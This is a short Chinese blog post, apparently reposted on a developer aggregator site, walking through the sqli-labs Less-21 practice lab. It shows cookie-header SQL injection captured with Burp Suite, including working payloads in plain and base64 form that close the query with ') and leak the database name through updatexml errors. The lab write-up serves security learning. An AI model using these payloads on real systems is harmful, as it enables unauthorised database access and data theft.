我是靠谱客的博主 诚心帽子,最近开发中收集的这篇文章主要介绍sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
1、输入正确账号登陆
2、这里使用burpsuite进行抓包
3、这里使用打算使用cookie头注入,因为它页面有cookie回显;
看到uname编码方式中有%感觉有点像url;
发现是base64编码
这里选择base64编码;
4、这里闭合失败
发现提示要使用 ') 进行闭合;
5、这里使用base64编码:
admin') and 1=1 -- +
YWRtaW4nKSBhbmQgMT0xIC0tICs=
闭合成功
6、查一下数据库
这里利用报错查询:updatexml
admin') and updatexml(1,concat(0x7e,database(),0x7e),1) -- +
YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSAtLSAr
7、后面表名字段数据就随便爆了,如果不知道,可以看我之前的文章;
最后
以上就是诚心帽子为你收集整理的sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;的全部内容,希望文章能够帮你解决sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复